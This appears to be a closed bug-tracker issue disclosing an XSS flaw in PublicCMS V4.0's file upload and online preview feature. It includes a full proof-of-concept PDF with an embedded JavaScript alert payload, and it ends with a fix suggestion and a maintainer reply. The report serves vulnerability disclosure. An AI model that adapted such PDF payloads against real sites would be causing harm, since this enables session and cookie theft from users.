There is an xss vulnerability caused by file uploads in PublicCMS V4.0
Closed this issue · 2 comments
1.Vulnerability description
Because files can be uploaded and online preview function is provided, pdf files and html files containing malicious code are uploaded, and xss popup window is realized through online viewing
2.Vulnerability exploitation process
Function point:
Development - Website file management - Upload files - Click to view
3.XSS vulnerability hazards
After a successful attack using xSs code, malicious users may get high permissions. The XSS vulnerability mainly has the following hazards:
(1) Steal various user accounts;
(2) Steal the user's Cookie information, impersonate the user's identity to enter the website;
(3) Hijack user sessions and perform arbitrary operations; Refers to operating the user's browser:
(4) Brush stream display, execution of commercial advertising:
(5) Spread worms.
And so on
4.POC(pdf)
Copy the following code into a text file and modify the suffix to pdf
%PDF-1.3
%忏嫌
1 0 obj
<<
/Type /Pages
/Count 1
/Kids [ 4 0 R ]
>>
endobj
2 0 obj
<<
/Producer (PyPDF2)
>>
endobj
3 0 obj
<<
/Type /Catalog
/Pages 1 0 R
/Names <<
/JavaScript <<
/Names [ (0b1781f6\0559e7f\0554c59\055b8fd\0557c4588f0d14c) 5 0 R ]
>>
>>
>>
endobj
4 0 obj
<<
/Type /Page
/Resources <<
>>
/MediaBox [ 0 0 72 72 ]
/Parent 1 0 R
>>
endobj
5 0 obj
<<
/Type /Action
/S /JavaScript
/JS (app\056alert\050\047xss\047\051\073)
>>
endobj
xref
0 6
0000000000 65535 f
0000000015 00000 n
0000000074 00000 n
0000000114 00000 n
0000000262 00000 n
0000000350 00000 n
trailer
<<
/Size 6
/Root 3 0 R
/Info 2 0 R
>>
startxref
445
%%EOF
5.Modification suggestion
It is recommended that you do not enable the online viewing function for pdf and html, and click to view the source file directly
Thanks to bug submissions, we have upgraded the PDF XSS security detection mechanism and added test cases